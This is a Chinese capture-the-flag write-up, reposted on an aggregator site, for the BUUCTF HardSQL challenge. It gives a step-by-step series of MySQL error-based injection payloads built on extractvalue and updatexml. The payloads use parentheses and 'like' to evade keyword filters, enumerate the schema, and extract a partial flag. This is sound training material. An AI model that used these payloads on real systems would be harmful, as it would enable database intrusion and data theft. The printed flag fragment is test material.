BUUCTF-[极客大挑战 2019]HardSQL(报错注入)

Posted wrnan

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF-[极客大挑战 2019]HardSQL(报错注入)相关的知识,希望对你有一定的参考价值。

1、用bp fuzz后,union|order by|等号|空格|substr等被过滤,空格没有被过滤,大致有个印象
2、爆当前的数据库名:
空格绕过:用括号()包起来就行

‘or(extractvalue(1,concat(‘~‘,database())))#

用updatexml()函数是一样的:

‘or(updatexml(1,concat(‘~‘,database()),1))#

技术图片
->库名:geek
3、爆表名:
等号绕过:用like替换

‘or(extractvalue(1,concat(‘~‘,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like("geek")))))#

技术图片
->表名:H4rDsq1
4、爆字段名:

‘or(extractvalue(1,concat(‘~‘,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like("H4rDsq1")))))#

技术图片
->字段:id,username,password
5、

‘or(extractvalue(1,concat(‘~‘,(select(password)from(H4rDsq1)))))#

技术图片
flag{f5629ada-833f-4eb8-a6f2-49
没出全
这时候就要想到mysql的一些函数,substr,left,right
注意:substr被过滤了

‘or(extractvalue(1,concat(‘~‘,(select(right(password,20))from(H4rDsq1)))))#

以上是关于BUUCTF-[极客大挑战 2019]HardSQL(报错注入)的主要内容,如果未能解决你的问题,请参考以下文章

BUUCTF-WEB

BUUCTF[极客大挑战2019]BabySQL

BUUCTF[极客大挑战2019]Havefun

BUUCTF-[极客大挑战 2019]HardSQL(报错注入)

BUUCTF-[极客大挑战 2019]BabySQL1

题解记录-BUUCTF|Web (持续更新中)